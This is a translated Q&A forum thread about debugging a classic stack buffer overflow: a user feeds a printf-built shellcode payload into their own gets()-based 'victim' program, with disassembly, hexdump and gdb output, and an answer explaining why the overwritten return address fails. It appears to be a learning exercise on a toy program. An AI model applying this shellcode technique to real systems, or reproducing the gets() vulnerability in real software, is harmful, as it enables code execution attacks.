我正在尝试将shellcode注入我创建的基本程序,该程序接受用户输入。我的问题是,即使我已正确排列我的shellcode,以便我能够重写堆栈中的返回地址,正确的地址不会存储在该位置。我做了一个我的shellcode的printf,然后是一些计算的填充,然后是我的shellcode在堆栈中的位置。
$ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41
\x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80
\xf4%025x\x5e\xf3\xff\xbf" | ./victim
我尝试覆盖返回地址的地址是0xbffff35e。然而,当我在gdb中运行它时,会出现段错误,因为“5e”部分未正确编码到我的堆栈中。
我在gdb中得到这个:
Program terminated with signal 11, Segmentation fault.
#0 0xbffff365 in ?? ()
我的程序应该在0xbffff35e执行指令,但是用“65”代替“5e”字节应该写入。我正确使用十六进制格式说明符,为什么会出现这种情况呢?除了\ x5e十六进制字节
之外,其他每个字节似乎都写得正确修改 这是我受害者的代码。我想做的就是注入shellcode,以便打印出“ACCEPTED”,而不是到达打印“DENIED”的下一行
void getPass() {
char password[50];
gets(password);
}
int main() {
printf("Please enter your password: \n");
getPass();
printf("PASSWORD DENIED\n");
return 0;
}
反汇编我的受害者代码
(gdb) disas getPass
Dump of assembler code for function getPass:
0x080482bc <+0>: push %ebp
0x080482bd <+1>: mov %esp,%ebp
0x080482bf <+3>: sub $0x58,%esp
0x080482c2 <+6>: lea -0x3a(%ebp),%eax
0x080482c5 <+9>: mov %eax,(%esp)
0x080482c8 <+12>: call 0x8049370 <gets>
0x080482cd <+17>: leave
0x080482ce <+18>: ret
(gdb) disas main
Dump of assembler code for function main:
0x080482cf <+0>: push %ebp
0x080482d0 <+1>: mov %esp,%ebp
0x080482d2 <+3>: and $0xfffffff0,%esp
0x080482d5 <+6>: sub $0x10,%esp
0x080482d8 <+9>: movl $0x80b314c,(%esp)
0x080482df <+16>: call 0x8049510 <puts>
0x080482e4 <+21>: call 0x80482bc <getPass>
0x080482e9 <+26>: movl $0x80b3169,(%esp)
0x080482f0 <+33>: call 0x8049510 <puts>
0x080482f5 <+38>: mov $0x0,%eax
0x080482fa <+43>: leave
0x080482fb <+44>: ret
答案 0 :(得分:0)
该printf的输出是
[wally@lenovoR61 ~]$ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41\x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80\xf4%025x\x5e\xf3\xff\xbf" \
> | hexdump -C
00000000 e8 09 00 00 00 41 43 43 45 50 54 45 44 6e 59 c6 |.....ACCEPTEDnY.|
00000010 41 08 00 ba 08 00 00 00 bb 01 00 00 00 b8 04 00 |A...............|
00000020 00 00 0c 80 f4 30 30 30 30 30 30 30 30 30 30 30 |.....00000000000|
00000030 30 30 30 30 30 30 30 30 30 30 30 30 30 30 5e f3 |00000000000000^.|
00000040 ff bf |..|
00000042
所以,从字节50开始,就是这样:
00000032 30 30 30 30 30 30 30 30 30 30 30 30 5e f3 | 000000000000^.|
00000040 ff bf |..|
00000042
因此,保存的30和返回地址应该是一堆ebp。 getPass()的说明是:
getPass:
pushl %ebp
movl %esp, %ebp
subl $88, %esp
leal -58(%ebp), %eax
movl %eax, (%esp)
call gets
leave
ret
因此leave会更改&#34;已恢复&#34; ebp到0x30303030,因为堆栈的那部分被覆盖了。返回地址低于该值,也就是0x30303030,至少在32位x86代码中。
即使在SELinux上,我也希望这总是会出现段错误。
附录:
嗯,所需的地址似乎对我有用。要设置它以便gdb可以查看堆栈框架,我将数据写入文件并更改victim.c以改为读取它:
$ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41\x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80\xf4%025x\x5e\xf3\xff\xbf" \
> >victim.txt
$ cat victim.c
#include <stdio.h>
void getPass()
{
char password[50];
gets(password);
}
int main()
{
FILE *f = freopen ("victim.txt", "r", stdin);
printf("Please enter your password: \n");
getPass();
printf("PASSWORD DENIED\n");
return 0;
}
$ gdb victim
...
Temporary breakpoint 1, main () at victim.c:12
12 FILE *f = freopen ("victim.txt", "r", stdin);
(gdb) next
13 printf("Please enter your password: \n");
(gdb)
Please enter your password:
14 getPass();
(gdb) step
getPass () at victim.c:6
6 gets(password);
(gdb) bt
#0 getPass () at victim.c:7
#1 0xbffff35e in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) step
Cannot access memory at address 0x30303034
这表明它正在返回0x30303030。你得到了什么?